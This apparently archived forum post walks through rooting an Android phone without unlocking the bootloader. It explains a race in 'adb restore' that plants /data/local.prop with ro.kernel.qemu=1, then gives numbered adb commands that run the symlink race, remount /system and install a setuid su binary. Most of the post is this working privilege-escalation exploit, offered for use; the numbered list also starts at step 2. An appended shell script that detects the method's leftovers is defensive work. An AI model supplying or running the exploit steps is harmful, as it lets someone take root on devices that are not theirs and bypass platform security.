08-09-13, 10:33 pm
how root without unlocking bootloader works
root without unlocking bootloader – the way this works is as follows: the “adb restore” command needs to be able to write to /data to restore a backup. because of this, we can find a way to write something to /data while this is being done. now, android parses a file called /data/local.prop on boot. if the following line exists in local.prop, it will boot your device in emulator mode with root shell access: ro.kernel.qemu=1. so, if we can place a file called local.prop with the aforementioned line in /data, once your device boots, it will boot in emulator mode and the shell user has root access, so we now can mount the system partition as r/w.
step-by-step root without unlocking bootloader:
2) open a command prompt in that same directory;
3) copy the root files to your device:
adb push su /data/local/tmp/su
adb push superuser.apk /data/local/tmp/superuser.apk
4) restore the fake “backup”: adb restore fakebackup.ab note: do not click restore on your device. just enter the command into the command prompt on your pc and press the enter key.
5) run the “exploit”: adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done" note: when you enter this command, you should see your adb window flooded with errors — this is what is supposed to happen.
6) now that the “exploit” is running, click restore on your device.
7) once it finishes, reboot your device: adb reboot note: do not try to use your device when it reboots. running this exploit will reboot your device into emulator mode, so it will be laggy and the screen will flicker — this is normal.
8) once it is rebooted, open a shell: adb shell
note: once you do step 8, you should have a root shell, i.e., your prompt should be #, not $. if not, it did not work. start again from step 4. (it may take a few tries for it to work.)
now we can copy su and superuser.apk to the correct spots to give us root.
9) mount the system partition as r/w: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
10) copy su to /system: cat /data/local/tmp/su > /system/bin/su
11) change permissions on su: chmod 06755 /system/bin/su
12) symlink su to /xbin/su: ln -s /system/bin/su /system/xbin/su
13) copy superuser.apk to /system: cat /data/local/tmp/superuser.apk > /system/app/superuser.apk
14) change permissions on superuser.apk: chmod 0644 /system/app/superuser.apk
15) delete the file that the exploit created: rm /data/local.prop
16) exit the adb shell: exit (may have to type exit twice to get back to your command prompt.)
17) type the following (not sure if this is needed for the gnex, but it shouldn’t matter): adb shell "sync; sync; sync;"
18) reboot: adb reboot
19) done. you now should have root without having to unlock your bootloader
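As an added example (this is not code from the post above, and not part of any rooting tool), the POSIX sh script below checks a filesystem for the artifacts that this procedure leaves behind: the local.prop with ro.kernel.qemu=1, the leftover symlink under /data/data/com.android.settings/a/, the setuid su in /system/bin, the /system/xbin/su symlink, superuser.apk in /system/app, and the staged files in /data/local/tmp. All of those paths come from the steps above; the sample directory tree that make_sample_tree builds is constructed for demonstration and is not real device data. Run check_root_indicators / against a device in an adb shell, or point it at a directory where a device image has been extracted, for an offline integrity check.

```shell
#!/bin/sh
# Added example: integrity check for the artifacts left by the adb-restore /
# local.prop rooting method. Not part of the original post.

# check_root_indicators ROOT
#   ROOT is "/" when run on a device, or a directory holding an extracted
#   device image. Prints one line per indicator found, then the total count.
check_root_indicators() {
    root="${1%/}"
    found=0

    # 1. /data/local.prop forcing emulator mode (gives the shell user root on boot)
    if [ -f "$root/data/local.prop" ] && grep -q '^ro.kernel.qemu=1' "$root/data/local.prop"; then
        echo "INDICATOR: /data/local.prop sets ro.kernel.qemu=1"
        found=$((found + 1))
    fi

    # 2. leftover symlink from the restore race (step 5 of the post)
    if [ -L "$root/data/data/com.android.settings/a/file99" ]; then
        echo "INDICATOR: race symlink present at /data/data/com.android.settings/a/file99"
        found=$((found + 1))
    fi

    # 3. su binary in /system/bin, flagged separately if it is setuid
    if [ -f "$root/system/bin/su" ]; then
        if [ -u "$root/system/bin/su" ]; then
            echo "INDICATOR: setuid su binary at /system/bin/su"
        else
            echo "INDICATOR: su binary at /system/bin/su (not setuid)"
        fi
        found=$((found + 1))
    fi

    # 4. su reachable via /system/xbin (symlink or copy)
    if [ -L "$root/system/xbin/su" ] || [ -f "$root/system/xbin/su" ]; then
        echo "INDICATOR: su present at /system/xbin/su"
        found=$((found + 1))
    fi

    # 5. superuser.apk installed as a system app
    if [ -f "$root/system/app/superuser.apk" ]; then
        echo "INDICATOR: superuser.apk in /system/app"
        found=$((found + 1))
    fi

    # 6. payloads staged in /data/local/tmp (step 3 of the post)
    for f in su superuser.apk; do
        if [ -f "$root/data/local/tmp/$f" ]; then
            echo "INDICATOR: staged $f in /data/local/tmp"
            found=$((found + 1))
        fi
    done

    echo "$found"
}

# count_root_indicators ROOT: numeric total only, for use in scripts.
count_root_indicators() {
    check_root_indicators "$1" | tail -n 1
}

# make_sample_tree DIR: constructed sample tree mimicking a device after
# steps 3, 5 and 9-14 of the post. Empty placeholder files, not real binaries.
make_sample_tree() {
    dir="$1"
    mkdir -p "$dir/data/local/tmp" "$dir/data/data/com.android.settings/a" \
             "$dir/system/bin" "$dir/system/xbin" "$dir/system/app"
    printf 'ro.kernel.qemu=1\n' > "$dir/data/local.prop"
    ln -s /data/local.prop "$dir/data/data/com.android.settings/a/file99"
    : > "$dir/system/bin/su"
    chmod 06755 "$dir/system/bin/su"
    ln -s /system/bin/su "$dir/system/xbin/su"
    : > "$dir/system/app/superuser.apk"
    : > "$dir/data/local/tmp/su"
    : > "$dir/data/local/tmp/superuser.apk"
}

# Demo: build the constructed tree in a temp dir and scan it (expect 7 hits).
demo_dir="$(mktemp -d)"
make_sample_tree "$demo_dir"
check_root_indicators "$demo_dir"
rm -rf "$demo_dir"
```

On an old device the toolbox sh may lack mktemp, so only the check_root_indicators function is meant to run there; the demo and sample tree are for a host machine. A clean device should report 0; any non-zero count on a device you did not root yourself is worth investigating.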